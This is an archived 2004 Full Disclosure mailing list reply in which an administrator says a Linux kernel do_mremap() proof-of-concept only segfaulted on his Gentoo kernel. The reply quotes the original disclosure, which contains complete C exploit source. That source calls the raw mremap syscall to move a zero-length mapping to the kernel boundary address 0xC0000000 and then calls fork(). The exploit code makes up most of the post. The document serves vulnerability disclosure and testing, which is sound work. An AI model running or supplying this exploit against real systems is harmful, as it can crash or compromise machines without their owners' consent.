Full Disclosure mailing list archives
RE: Linux kernel do_mremap() proof-of-concept exploit code
From: Bryce Porter <bporter () heart net>
Date: Wed, 7 Jan 2004 09:40:00 -0600
I tested this on a Gentoo-patched 2.4.23 kernel and it did nothing except segfault. Not sure exactly which patches Gentoo uses, but it could be a grsecurity limitation or some such.

I compiled the code by doing this:

gcc -o mremap_poc mremap_poc.c

And I ran it as a normal user.

Hope this helps...

Regards,
Bryce Porter (x86)
Network Administrator
Heart Technologies, Inc.
Direct 309-634-2282
Toll-Free 877-733-4638
Fax 309-697-3191

-----Original Message-----
From: Christophe Devine [mailto:devine () iie cnam fr]
Sent: Monday, January 05, 2004 3:23 PM
To: full-disclosure () lists netsys com; bugtraq () securityfocus com
Subject: Linux kernel do_mremap() proof-of-concept exploit code

The following program can be used to test if an x86 Linux system is vulnerable to the do_mremap() exploit; use at your own risk.

$ cat mremap_poc.c
/*
 * Proof-of-concept exploit code for do_mremap()
 *
 * Copyright (C) 2004 Christophe Devine and Julien Tinnes
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

/* Invoke the raw mremap(2) syscall directly, bypassing the libc wrapper,
 * so that the argument values below reach the kernel unmodified. */
#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap,
                         void *, old_address,
                         size_t, old_size,
                         size_t, new_size,
                         unsigned long, flags,
                         void *, new_address );

int main( void )
{
    void *base;

    /* Two anonymous, writable pages to use as the source mapping. */
    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    /* Ask the kernel to move a zero-length region (old_size == 0,
     * new_size == 0) to the fixed address 0xC0000000, the top of the
     * user address space on a 32-bit x86 kernel with the default split.
     * A vulnerable kernel accepts this request instead of rejecting it. */
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    /* fork() forces the kernel to copy the process's mappings, which is
     * where the damage done above becomes visible. */
    fork();

    return( 0 );
}

-- 
Christophe Devine - http://www.cr0.net:8040/about/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html